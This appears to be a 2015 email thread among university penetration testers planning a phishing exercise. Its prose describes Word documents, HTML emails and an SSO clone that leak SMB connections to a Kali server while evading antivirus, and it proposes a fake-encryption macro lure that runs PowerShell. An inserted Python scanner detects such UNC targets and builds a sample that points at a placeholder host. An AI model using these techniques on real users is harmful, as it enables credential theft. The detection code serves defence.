
Oh... Tomorrow's planned Phish begs for this! See code to make it happen at the bottom of the article.
https://www.trustwave.com/Resources/SpiderLabs-Blog/Adventures-in-Social-Eng...

FYI, your papers were delivered to Matt Timpson today.
Jake
From: Chuck Kimber <chuck.kimber@usu.edu>
Date: Wednesday, June 3, 2015 at 9:59 PM
To: USHE-assess@lists.dixie.edu
Subject: [USHE-assess] SUU Phish
Oh... Tomorrow's planned Phish begs for this! See code to make it happen at the bottom of the article.
https://www.trustwave.com/Resources/SpiderLabs-Blog/Adventures-in-Social-Eng...

Okay, so I got this to work, with a docx file. It would work with any of the MS .blahX files though, which are just zipped-up XML, images and whatever else went into your document, spreadsheet, presentation, whatever.
This .docx has two references to the fake SMB daemon, running on Kali 1, just to be sure. There is an embedded image in the file and an internal reference to a template (.dotx - you'll notice Word searching for it at the Kali 1 address, on startup) that are both said to be on the Kali box. They don't alert AV at all, they are part of MS's open spec after all, but I've noticed they don't work from Office 365 or Google Apps. Also AbiWord and LibreOffice seem to ignore the references. If someone wants to test it on MS Office for Mac, I'd be curious to see what happens there. ...I guess I haven't tried OpenOffice yet either.
This should be a pretty effective tool for both phish- and switchblade-type operations. Not as cool as popping a reverse shell, but it should give a nice toehold somewhere and no local or email AV to worry about tripping on.
Per the email Jake sent around a while ago referencing the same technique with HTML (http://blog.cylance.com/redirect-to-smb), this evil SMB redirect trick should work with lots of software, on various OS platforms. I'm keen to take it further. I think Jon suggested embedding it in the Phish website. How cool would it be to send an embedded SMB link, in an HTML email, with an attached .docx. Of course, put yet another embedded SMB image on the SSO clone for when they get that far. If their mail reader is susceptible, you get them when they open the email. If their document reader is susceptible, you get them there. If their browser is susceptible, you nail them when they visit the site, and then of course you also get them if they log in at the SSO clone. Run three different fake SMB daemons on the Kali boxes and we can quantify which method brought them to us.
I've already run into a few of the simple remediation methods for this (block outbound 445) but I'm hoping a few people will be on laptops and tablets and outside the institution's network when they try. Of course once onsite it will be interesting to do again just to see how segmented the internal networks are.
The attached document is what I have so far. Be very careful opening it in a non-test environment. Not that I'm going to try to crack anything we get, but you know, just be careful with it.
FWIW,
Chuck
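A defender-side check for the kind of document described in the message above, added here as example code (it is not Chuck's attachment and not code from the linked article): it unpacks an OOXML package and lists every relationship with TargetMode="External" whose target is a UNC path or file: URL, which is exactly what makes Word reach out to an SMB server for an external image or attached template when the file is opened. The sample package is constructed inline and holds only the relationship parts, with the placeholder address 192.0.2.10 standing in for the Kali box; it is not an openable document.

```python
"""Scan an OOXML package (.docx/.xlsx/.pptx) for relationship targets that
would make Office open an SMB connection when the file is opened.
Added example; the sample package and the 192.0.2.10 host are constructed."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import unquote

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# A target starting with \\ (UNC path) or file: (file URL) is resolved through
# the Windows redirector, i.e. SMB; http(s) targets are not.
SMB_TARGET_RE = re.compile(r"^(?:\\\\|file:)", re.IGNORECASE)
HOST_RE = re.compile(r"^(?:\\\\|file:/*)([^\\/]+)", re.IGNORECASE)


def external_smb_targets(package_bytes):
    """Return [(rels_part, relationship_kind, target), ...] for every
    TargetMode="External" relationship whose target is a UNC path or file: URL."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(package_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                # Percent-decode first so an encoded "%5C%5C" prefix is not missed.
                target = unquote(rel.get("Target", ""))
                if SMB_TARGET_RE.match(target):
                    kind = rel.get("Type", "").rsplit("/", 1)[-1]
                    findings.append((name, kind, target))
    return findings


def target_host(target):
    """Host portion of a UNC path or file: URL (for blocking or alerting);
    None for anything else."""
    m = HOST_RE.match(target)
    return m.group(1) if m else None


def build_sample_package():
    """Constructed test input: a zip holding only the relationship parts a
    scanner cares about (no [Content_Types].xml, no document.xml, so it does
    not open as a document). One image and one attached template point at the
    placeholder host 192.0.2.10; one hyperlink is an ordinary https link."""
    def rels(*entries):
        body = "\n".join(entries)
        return (f'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
                f'<Relationships xmlns="{RELS_NS}">\n{body}\n</Relationships>')

    def rel(rid, kind, target, external=False):
        mode = ' TargetMode="External"' if external else ""
        return f'<Relationship Id="{rid}" Type="{OFFICE_REL}{kind}" Target="{target}"{mode}/>'

    parts = {
        "word/_rels/document.xml.rels": rels(
            rel("rId1", "styles", "styles.xml"),
            rel("rId2", "image", "\\\\192.0.2.10\\share\\logo.png", external=True),
            rel("rId3", "hyperlink", "https://example.org/", external=True),
        ),
        "word/_rels/settings.xml.rels": rels(
            rel("rId1", "attachedTemplate", "file://192.0.2.10/share/normal.dotx", external=True),
        ),
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, xml in parts.items():
            zf.writestr(name, xml)
    return buf.getvalue()


if __name__ == "__main__":
    for part, kind, target in external_smb_targets(build_sample_package()):
        print(f"{part}: {kind} -> {target} (host {target_host(target)})")
```

Run against a real file with `external_smb_targets(open(path, "rb").read())`; the ordinary https hyperlink in the sample is deliberately left out of the findings, since only UNC and file: targets trigger an SMB connection, and `target_host` gives the address to check against outbound-445 firewall logs or to block.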

Looks pretty cool. Great job Chuck. Even if the schools block 445 outbound, that's still a finding. Part of a pen test is validating the controls put in place. This is a great way to do that for outbound SMB.
Some malware authors are starting to go back to macros in Office documents. They trick the user into enabling macros by saying the document is encrypted and that to view the document they must click the button to enable macros. When they do that, they can execute their malware. We could use the same trick to execute a PowerShell script.
On Sun, Jul 5, 2015 at 9:19 PM -0700, "Chuck Kimber" <chuck.kimber@usu.edu> wrote:
Okay, so I got this to work, with a docx file. It would work with any of the MS .blahX files though, which are just zipped-up XML, images and whatever else went into your document, spreadsheet, presentation, whatever.
This .docx has two references to the fake SMB daemon, running on Kali 1, just to be sure. There is an embedded image in the file and an internal reference to a template (.dotx - you'll notice Word searching for it at the Kali 1 address, on startup) that are both said to be on the Kali box. They don't alert AV at all, they are part of MS's open spec after all, but I've noticed they don't work from Office 365 or Google Apps. Also AbiWord and LibreOffice seem to ignore the references. If someone wants to test it on MS Office for Mac, I'd be curious to see what happens there. ...I guess I haven't tried OpenOffice yet either.
This should be a pretty effective tool for both phish- and switchblade-type operations. Not as cool as popping a reverse shell, but it should give a nice toehold somewhere and no local or email AV to worry about tripping on.
Per the email Jake sent around a while ago referencing the same technique with HTML (http://blog.cylance.com/redirect-to-smb), this evil SMB redirect trick should work with lots of software, on various OS platforms. I'm keen to take it further. I think Jon suggested embedding it in the Phish website. How cool would it be to send an embedded SMB link, in an HTML email, with an attached .docx. Of course, put yet another embedded SMB image on the SSO clone for when they get that far. If their mail reader is susceptible, you get them when they open the email. If their document reader is susceptible, you get them there. If their browser is susceptible, you nail them when they visit the site, and then of course you also get them if they log in at the SSO clone. Run three different fake SMB daemons on the Kali boxes and we can quantify which method brought them to us.
I've already run into a few of the simple remediation methods for this (block outbound 445) but I'm hoping a few people will be on laptops and tablets and outside the institution's network when they try. Of course once onsite it will be interesting to do again just to see how segmented the internal networks are.
The attached document is what I have so far. Be very careful opening it in a non-test environment. Not that I'm going to try to crack anything we get, but you know, just be careful with it.
FWIW,
Chuck
Participants (3): Chuck Kimber, Jake Johansen, Jon Barclay